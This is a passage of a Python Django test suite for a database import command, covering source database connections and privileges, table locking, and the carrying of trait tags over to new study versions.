for k in row:
if isinstance(row[k], datetime):
self.assertTrue(isinstance(fixed_row[k], datetime))
def test_fix_timezone_empty_dict(self):
"""_fix_timezone works properly on (doesn't alter) an empty dictionary input."""
row = {}
fixed_row = CMD._fix_timezone(row)
self.assertDictEqual(fixed_row, row)
def test_fix_timezone_no_datetimes(self):
"""A dict containing no datetime objects is unaltered by _fix_timezone."""
row = {'a': 1, 'b': 'foobar', 'c': 1.56, 'd': None, 'e': bytearray('foobar', 'utf-8')}
fixed_row = CMD._fix_timezone(row)
self.assertDictEqual(fixed_row, row)
class GetSourceDbTest(TestCase):
"""Tests of the _get_source_db() utility function."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.expected_privileges = 'SELECT, LOCK TABLES'
cls.expected_user = 'pie'
cls.expected_devel_db = r'topmed_pheno_devel_.+'
cls.expected_production_db = 'topmed_pheno'
def test_returns_correct_devel_db(self):
"""Connects to a db that matches the expected db name pattern."""
db = CMD._get_source_db(which_db='devel')
db_name = db.database.decode('utf-8')
db.close()
self.assertRegex(db_name, self.expected_devel_db)
def test_returns_correct_production_db(self):
"""Connectes to a db that matched the expected production db name."""
db = CMD._get_source_db(which_db='production')
db_name = db.database.decode('utf-8')
db.close()
self.assertEqual(db_name, self.expected_production_db)
def test_timezone_is_utc(self):
"""The timezone of the source_db MySQL connection is UTC."""
db = CMD._get_source_db(which_db='devel')
db_timezone = db.time_zone.decode('utf-8')
db.close()
self.assertEqual('+00:00', db_timezone)
def test_devel_expected_privileges_and_user(self):
"""Connects with expected privileges and user on the devel db."""
db = CMD._get_source_db(which_db='devel')
cursor = db.cursor()
cursor.execute('SHOW GRANTS')
grants = cursor.fetchall()
grants = [el[0].decode('utf-8') for el in grants]
non_usage = [el for el in grants if 'USAGE' not in el][0]
self.assertRegex(non_usage,
r"GRANT {priv} ON `{db}`\.\* TO '{user}'".format(priv=self.expected_privileges,
db=self.expected_devel_db,
user=self.expected_user))
db.close()
def test_production_expected_privileges_and_user(self):
"""Connects with expected privileges and user on the devel db."""
db = CMD._get_source_db(which_db='production')
cursor = db.cursor()
cursor.execute('SHOW GRANTS')
grants = cursor.fetchall()
grants = [el[0].decode('utf-8') for el in grants]
non_usage = [el for el in grants if 'USAGE' not in el][0]
self.assertRegex(non_usage,
r"GRANT {priv} ON `{db}`\.\* TO '{user}'".format(priv=self.expected_privileges,
db=self.expected_production_db,
user=self.expected_user))
db.close()
def test_production_admin_error(self):
"""Raises error when trying to connect to production as admin."""
with self.assertRaises(ValueError):
db = CMD._get_source_db(which_db='production', admin=True)
db.close()
def test_devel_expected_privileges_and_user_admin(self):
"""Connects with expected privileges and user on the devel db with admin argument."""
expected_admin_user = r'admin_topmed_pheno_devel_.+'
expected_admin_privileges = r'ALL PRIVILEGES'
db = CMD._get_source_db(which_db='devel', admin=True)
cursor = db.cursor()
cursor.execute('SHOW GRANTS')
grants = cursor.fetchall()
grants = [el[0].decode('utf-8') for el in grants]
non_usage = [el for el in grants if 'USAGE' not in el][0]
self.assertRegex(non_usage,
r"GRANT {priv} ON `{db}`\.\* TO '{user}'".format(priv=expected_admin_privileges,
db=self.expected_devel_db,
user=expected_admin_user))
db.close()
class LockSourceDbTest(TestCase):
"""Tests of the functions to lock the source db."""
def test_locks_all_tables_devel(self):
"""Locks all non-view tables in devel db."""
db = CMD._get_source_db(which_db='devel')
db_name = db.database.decode('utf-8')
CMD._lock_source_db(db)
cursor = db.cursor(dictionary=True)
cursor.execute(LOCKED_TABLES_QUERY.format(db_name=db_name))
locked_tables = [row['Table'].decode('utf-8') for row in cursor]
cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
all_tables = [row['Tables_in_' + db_name].decode('utf-8') for row in cursor]
all_tables = [el for el in all_tables if not el.startswith('view_')]
all_tables.sort()
locked_tables.sort()
self.assertListEqual(all_tables, locked_tables)
db.close() # Testing confirms that closing the db connection removes the locks.
def test_closing_db_leaves_no_locked_tables(self):
"""Leaves the tables unlocked in devel db after the db is closed."""
db = CMD._get_source_db(which_db='devel')
db_name = db.database.decode('utf-8')
cursor = db.cursor(dictionary=True)
cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
all_tables = [row['Tables_in_' + db_name].decode('utf-8') for row in cursor]
all_tables = [el for el in all_tables if not el.startswith('view_')]
all_tables.sort()
CMD._lock_source_db(db)
cursor.execute(LOCKED_TABLES_QUERY.format(db_name=db_name))
locked_tables = [row['Table'].decode('utf-8') for row in cursor]
locked_tables.sort()
self.assertListEqual(all_tables, locked_tables)
cursor.close()
db.close() # Testing confirms that closing the db connection removes the locks.
db = CMD._get_source_db(which_db='devel')
cursor = db.cursor(dictionary=True)
cursor.execute(UNLOCKED_TABLES_QUERY.format(db_name=db_name))
unlocked_tables = [row['Table'].decode('utf-8') for row in cursor]
unlocked_tables = [el for el in unlocked_tables if not el.startswith('view_')]
unlocked_tables.sort()
self.assertListEqual(all_tables, unlocked_tables)
# This test may be used on an ad hoc basis, but not included in regular testing.
# Comment out the decorator to run the test.
@skip("Skip this test because it locks the production topmed_pheno db and will be disruptive to others.")
def test_locks_all_tables_production(self):
"""Locks all non-view tables in production db."""
db = CMD._get_source_db(which_db='production')
db_name = db.database.decode('utf-8')
CMD._lock_source_db(db)
cursor = db.cursor(dictionary=True)
cursor.execute(LOCKED_TABLES_QUERY.format(db_name=db_name))
locked_tables = [row['Table'].decode('utf-8') for row in cursor]
cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
all_tables = [row['Tables_in_' + db_name].decode('utf-8') for row in cursor]
all_tables = [el for el in all_tables if not el.startswith('view_')]
all_tables.sort()
locked_tables.sort()
self.assertListEqual(all_tables, locked_tables)
db.close()
class UnlockSourceDbTest(TestCase):
"""Tests of the functions to unlock the source db."""
def test_unlocks_all_tables_devel(self):
"""Unlocks all tables in devel db."""
db = CMD._get_source_db(which_db='devel')
db_name = db.database.decode('utf-8')
CMD._lock_source_db(db)
CMD._unlock_source_db(db)
cursor = db.cursor(dictionary=True)
cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
all_tables = [row['Tables_in_' + db_name].decode('utf-8') for row in cursor]
all_tables = [el for el in all_tables if not el.startswith('view_')]
all_tables.sort()
cursor.execute(LOCKED_TABLES_QUERY.format(db_name=db_name))
locked_tables = [row['Table'].decode('utf-8') for row in cursor]
locked_tables.sort()
self.assertEqual(len(locked_tables), 0)
cursor.execute(UNLOCKED_TABLES_QUERY.format(db_name=db_name))
unlocked_tables = [row['Table'].decode('utf-8') for row in cursor]
unlocked_tables = [el for el in unlocked_tables if not el.startswith('view_')]
unlocked_tables.sort()
self.assertListEqual(all_tables, unlocked_tables)
db.close()
# This test may be used on an ad hoc basis, but not included in regular testing.
# Comment out the decorator to run the test.
@skip("Skip this test because it locks the production topmed_pheno db and will be disruptive to others.")
def test_unlocks_all_tables_production(self):
"""Unlocks all tables in production db."""
db = CMD._get_source_db(which_db='production')
db_name = db.database.decode('utf-8')
CMD._lock_source_db(db)
CMD._unlock_source_db(db)
cursor = db.cursor(dictionary=True)
cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
all_tables = [row['Tables_in_' + db_name].decode('utf-8') for row in cursor]
all_tables = [el for el in all_tables if not el.startswith('view_')]
all_tables.sort()
cursor.execute(LOCKED_TABLES_QUERY.format(db_name=db_name))
locked_tables = [row['Table'].decode('utf-8') for row in cursor]
locked_tables.sort()
self.assertEqual(len(locked_tables), 0)
cursor.execute(UNLOCKED_TABLES_QUERY.format(db_name=db_name))
unlocked_tables = [row['Table'].decode('utf-8') for row in cursor]
unlocked_tables = [el for el in unlocked_tables if not el.startswith('view_')]
unlocked_tables.sort()
self.assertListEqual(all_tables, unlocked_tables)
db.close()
class M2MHelperTest(TestCase):
"""Tests of the helper functions for importing and updating m2m tables."""
def test_break_m2m_link(self):
"""Removes a child model from its parent M2M field."""
htsv = factories.HarmonizedTraitSetVersionFactory.create()
reason = factories.AllowedUpdateReasonFactory.create()
htsv.update_reasons.add(reason)
CMD._break_m2m_link(
models.HarmonizedTraitSetVersion, htsv.pk, models.AllowedUpdateReason, reason.pk, 'update_reasons')
self.assertNotIn(reason, htsv.update_reasons.all())
def test_make_m2m_link(self):
"""Adds a child model to its parent M2M field."""
htsv = factories.HarmonizedTraitSetVersionFactory.create()
reason = factories.AllowedUpdateReasonFactory.create()
htsv.update_reasons.add(reason)
CMD._make_m2m_link(
models.HarmonizedTraitSetVersion, htsv.pk, models.AllowedUpdateReason, reason.pk, 'update_reasons')
self.assertIn(reason, htsv.update_reasons.all())
def test_import_new_m2m_field(self):
pass
def test_update_m2m_field(self):
pass
class GetCurrentListsTest(TestCase):
"""Tests of _get_current_pks with each possible model."""
n = 32
def test_get_current_global_studies(self):
"""Returns the right number of global_study ids."""
factories.GlobalStudyFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.GlobalStudy)
self.assertEqual(len(pks), self.n)
def test_get_current_studies(self):
"""Returns the right number of study ids."""
factories.StudyFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.Study)
self.assertEqual(len(pks), self.n)
def test_get_current_source_study_versions(self):
"""Returns the right number of source study version ids."""
factories.SourceStudyVersionFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.SourceStudyVersion)
self.assertEqual(len(pks), self.n)
def test_get_current_subcohorts(self):
"""Returns the right number of subcohort ids."""
factories.SubcohortFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.Subcohort)
self.assertEqual(len(pks), self.n)
def test_get_current_source_datasets(self):
"""Returns the right number of source dataset ids."""
factories.SourceTraitFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.SourceTrait)
self.assertEqual(len(pks), self.n)
def test_get_current_harmonized_trait_sets(self):
"""Returns the right number of harmonized trait sets."""
factories.HarmonizedTraitSetFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.HarmonizedTraitSet)
self.assertEqual(len(pks), self.n)
def test_get_current_allowed_update_reasons(self):
"""Returns the right number of allowed update reason ids."""
factories.AllowedUpdateReasonFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.AllowedUpdateReason)
self.assertEqual(len(pks), self.n)
def test_get_current_harmonized_trait_set_versions(self):
"""Returns the right number of harmonized trait set versions."""
factories.HarmonizedTraitSetVersionFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.HarmonizedTraitSetVersion)
self.assertEqual(len(pks), self.n)
def test_get_current_harmonization_units(self):
"""Returns the right number of hamronization units."""
factories.HarmonizationUnitFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.HarmonizationUnit)
self.assertEqual(len(pks), self.n)
def test_get_current_source_traits(self):
"""Returns the right number of source trait ids."""
factories.AllowedUpdateReasonFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.AllowedUpdateReason)
self.assertEqual(len(pks), self.n)
def test_get_current_harmonized_traits(self):
"""Returns the right number of harmonized trait ids."""
factories.HarmonizedTraitFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.HarmonizedTrait)
self.assertEqual(len(pks), self.n)
def test_get_current_source_trait_encoded_values(self):
"""Returns the right number of source trait encoded value ids."""
factories.SourceTraitEncodedValueFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.SourceTraitEncodedValue)
self.assertEqual(len(pks), self.n)
def test_get_current_harmonized_trait_encoded_values(self):
"""Returns the right number of harmonized trait encoded value ids."""
factories.HarmonizedTraitEncodedValueFactory.create_batch(self.n)
pks = CMD._get_current_pks(models.HarmonizedTraitEncodedValue)
self.assertEqual(len(pks), self.n)
# Tests that require test data.
class SourceDbTestDataTest(OpenCloseDBMixin, TestCase):
def test_load_all_source_db_test_data(self):
"""Load all test data sets and check study and version counts for each."""
clean_devel_db()
study_count_query = 'SELECT COUNT(*) AS study_count FROM study'
study_version_count_query = 'SELECT COUNT(*) AS ssv_count FROM source_study_version'
load_test_source_db_data('base.sql')
self.cursor.execute(study_count_query)
study_count = self.cursor.fetchone()['study_count']
self.cursor.execute(study_version_count_query)
ssv_count = self.cursor.fetchone()['ssv_count']
self.assertEqual(study_count, 2)
self.assertEqual(ssv_count, 3)
self.cursor.close()
self.source_db.close()
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
load_test_source_db_data('new_study.sql')
self.cursor.execute(study_count_query)
study_count = self.cursor.fetchone()['study_count']
self.cursor.execute(study_version_count_query)
ssv_count = self.cursor.fetchone()['ssv_count']
self.assertEqual(study_count, 3)
self.assertEqual(ssv_count, 4)
self.cursor.close()
self.source_db.close()
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
load_test_source_db_data('new_study_version.sql')
self.cursor.execute(study_count_query)
study_count = self.cursor.fetchone()['study_count']
self.cursor.execute(study_version_count_query)
ssv_count = self.cursor.fetchone()['ssv_count']
self.assertEqual(study_count, 3)
self.assertEqual(ssv_count, 5)
class SetDatasetNamesTest(BaseTestDataTestCase):
"""Tests of the _set_dataset_names method."""
@classmethod
def setUpClass(cls):
"""Create a user."""
super().setUpClass()
cls.user = UserFactory.create()
def test_dataset_name_after_import(self):
"""The dataset_name field is a valid-ish string after running an import."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
source_dataset_names = models.SourceDataset.objects.all().values_list('dataset_name', flat=True)
# None of the dataset_names are empty strings anymore.
self.assertNotIn('', source_dataset_names)
# None of the dataset names have a phs.v.pht.v string in them.
self.assertFalse(any([DBGAP_RE.search(name) for name in source_dataset_names]))
# None of the dataset names have any directory path in them.
self.assertFalse(any(['/' in name for name in source_dataset_names]))
def test_dbgap_filename_after_import(self):
"""The dbgap_filename field is a valid-ish string after running an import."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
source_dataset_files = models.SourceDataset.objects.all().values_list('dbgap_filename', flat=True)
# None of the dataset_names are empty strings anymore.
self.assertNotIn('', source_dataset_files)
# All of the file names have a phs.v.pht.v string in them.
self.assertTrue(all([DBGAP_RE.search(name) for name in source_dataset_files]))
# None of the file names have any directory path in them.
self.assertFalse(any(['/' in name for name in source_dataset_files]))
class ApplyTagsToNewSourceStudyVersionsTest(BaseTestDataTestCase):
"""Tests of the _apply_tags_to_new_sourcestudyversions() helper method."""
@classmethod
def setUpClass(cls):
"""Load the base test data and run the import_db management command."""
# Run the BaseTestDataTestCase setUpClass method.
super().setUpClass()
cls.user = UserFactory.create()
# Import the base test data.
management.call_command('import_db', '--no_backup', '--devel_db',
'--taggedtrait_creator={}'.format(cls.user.email))
def test_update_one_taggedtrait_with_one_new_sourcestudyversion(self):
"""Updates a single tagged trait with a new version."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
dataset1 = trait1.source_dataset
tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Make a new version of an existing ssv, dataset, and source trait.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 2)
# Look for the new taggedtrait version
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
def test_update_two_taggedtraits_with_one_new_sourcestudyversion(self):
"""Updates two tagged traits with a new version in the same study."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
another_trait1 = models.SourceTrait.objects.filter(
source_dataset__source_study_version=ssv1).exclude(
pk=trait1.pk
).order_by('?').first()
dataset1 = trait1.source_dataset
another_dataset1 = another_trait1.source_dataset
tag = TagFactory.create()
another_tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
another_taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=another_trait1, tag=another_tag)
DCCReview.objects.create(
tagged_trait=another_taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 2)
# Make a new version of an existing ssv, dataset, and source trait.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
another_dataset2 = copy(another_dataset1)
another_dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
another_dataset2.source_study_version = ssv2
another_dataset2.i_date_added = another_dataset1.i_date_added + timedelta(days=7)
another_dataset2.i_date_changed = another_dataset1.i_date_changed + timedelta(days=7)
another_dataset2.created = another_dataset1.created + timedelta(days=7)
another_dataset2.modified = another_dataset1.modified + timedelta(days=7)
another_dataset2.save()
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
another_trait2 = copy(another_trait1)
another_trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
another_trait2.source_dataset = dataset2
another_trait2.i_date_added = another_trait1.i_date_added + timedelta(days=7)
another_trait2.i_date_changed = another_trait1.i_date_changed + timedelta(days=7)
another_trait2.created = another_trait1.created + timedelta(days=7)
another_trait2.modified = another_trait1.modified + timedelta(days=7)
another_trait2.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 4)
# Look for the new taggedtrait version
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
another_taggedtrait2 = TaggedTrait.objects.get(trait=another_trait2)
self.assertEqual(another_taggedtrait2.previous_tagged_trait, another_taggedtrait1)
self.assertEqual(another_taggedtrait2.creator, user2)
def test_update_two_taggedtraits_with_two_new_sourcestudyversions(self):
"""Updates two tagged traits from two new versions of same study."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
dataset1 = trait1.source_dataset
tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Make two new source study versions.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
ssv3 = copy(ssv2)
ssv3.i_version = ssv2.i_version + 1
ssv3.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv3.i_date_added = ssv2.i_date_added + timedelta(days=7)
ssv3.i_date_changed = ssv2.i_date_changed + timedelta(days=7)
ssv3.created = ssv2.created + timedelta(days=7)
ssv3.modified = ssv2.modified + timedelta(days=7)
ssv3.save()
# Make two new datasets from the two new study versions.
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
dataset3 = copy(dataset2)
dataset3.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset3.source_study_version = ssv3
dataset3.i_date_added = dataset2.i_date_added + timedelta(days=7)
dataset3.i_date_changed = dataset2.i_date_changed + timedelta(days=7)
dataset3.created = dataset2.created + timedelta(days=7)
dataset3.modified = dataset2.modified + timedelta(days=7)
dataset3.save()
# Make two new traits from the two new datasets.
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
trait3 = copy(trait2)
trait3.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait3.source_dataset = dataset3
trait3.i_date_added = trait2.i_date_added + timedelta(days=7)
trait3.i_date_changed = trait2.i_date_changed + timedelta(days=7)
trait3.created = trait2.created + timedelta(days=7)
trait3.modified = trait2.modified + timedelta(days=7)
trait3.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk, ssv3.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 3)
# Look for the new taggedtrait versions.
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
taggedtrait3 = TaggedTrait.objects.get(trait=trait3)
self.assertEqual(taggedtrait3.previous_tagged_trait, taggedtrait2)
self.assertEqual(taggedtrait3.creator, user2)
def test_update_two_taggedtraits_with_two_new_sourcestudyversions_reversed(self):
"""Updates two tagged traits from two new versions of same study in reverse order."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
dataset1 = trait1.source_dataset
tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Make two new source study versions.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
ssv3 = copy(ssv2)
ssv3.i_version = ssv2.i_version + 1
ssv3.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv3.i_date_added = ssv2.i_date_added + timedelta(days=7)
ssv3.i_date_changed = ssv2.i_date_changed + timedelta(days=7)
ssv3.created = ssv2.created + timedelta(days=7)
ssv3.modified = ssv2.modified + timedelta(days=7)
ssv3.save()
# Make two new datasets from the two new study versions.
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
dataset3 = copy(dataset2)
dataset3.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset3.source_study_version = ssv3
dataset3.i_date_added = dataset2.i_date_added + timedelta(days=7)
dataset3.i_date_changed = dataset2.i_date_changed + timedelta(days=7)
dataset3.created = dataset2.created + timedelta(days=7)
dataset3.modified = dataset2.modified + timedelta(days=7)
dataset3.save()
# Make two new traits from the two new datasets.
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
trait3 = copy(trait2)
trait3.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait3.source_dataset = dataset3
trait3.i_date_added = trait2.i_date_added + timedelta(days=7)
trait3.i_date_changed = trait2.i_date_changed + timedelta(days=7)
trait3.created = trait2.created + timedelta(days=7)
trait3.modified = trait2.modified + timedelta(days=7)
trait3.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
# Give the ssv pks in the wrong order.
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv3.pk, ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 3)
# Look for the new taggedtrait versions.
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
taggedtrait3 = TaggedTrait.objects.get(trait=trait3)
self.assertEqual(taggedtrait3.previous_tagged_trait, taggedtrait2)
self.assertEqual(taggedtrait3.creator, user2)
def test_update_two_taggedtraits_with_new_versions_from_two_studies(self):
"""_apply_tags_to_new_sourcestudyversions updates two tagged traits from new versions of different studies."""
tag = TagFactory.create()
# Make a taggedtrait from existing base test data for one study.
study1_trait1 = models.SourceTrait.objects.current().order_by('?').first()
study1_ssv1 = study1_trait1.source_dataset.source_study_version
study1_dataset1 = study1_trait1.source_dataset
study1_taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=study1_trait1, tag=tag)
DCCReview.objects.create(
tagged_trait=study1_taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
# Make a taggedtrait from existing base test data for a second study.
study2_trait1 = models.SourceTrait.objects.current().exclude(
source_dataset__source_study_version__study=study1_trait1.source_dataset.source_study_version.study
).order_by('?').first()
study2_ssv1 = study2_trait1.source_dataset.source_study_version
study2_dataset1 = study2_trait1.source_dataset
study2_taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=study2_trait1, tag=tag)
DCCReview.objects.create(
tagged_trait=study2_taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 2)
# Make two new source study versions.
study1_ssv2 = copy(study1_ssv1)
study1_ssv2.i_version = study1_ssv1.i_version + 1
study1_ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
study1_ssv2.i_date_added = study1_ssv1.i_date_added + timedelta(days=7)
study1_ssv2.i_date_changed = study1_ssv1.i_date_changed + timedelta(days=7)
study1_ssv2.created = study1_ssv1.created + timedelta(days=7)
study1_ssv2.modified = study1_ssv1.modified + timedelta(days=7)
study1_ssv2.save()
study2_ssv2 = copy(study2_ssv1)
study2_ssv2.i_version = study2_ssv1.i_version + 1
study2_ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
study2_ssv2.i_date_added = study2_ssv1.i_date_added + timedelta(days=7)
study2_ssv2.i_date_changed = study2_ssv1.i_date_changed + timedelta(days=7)
study2_ssv2.created = study2_ssv1.created + timedelta(days=7)
study2_ssv2.modified = study2_ssv1.modified + timedelta(days=7)
study2_ssv2.save()
# Make two new datasets from the two new study versions.
study1_dataset2 = copy(study1_dataset1)
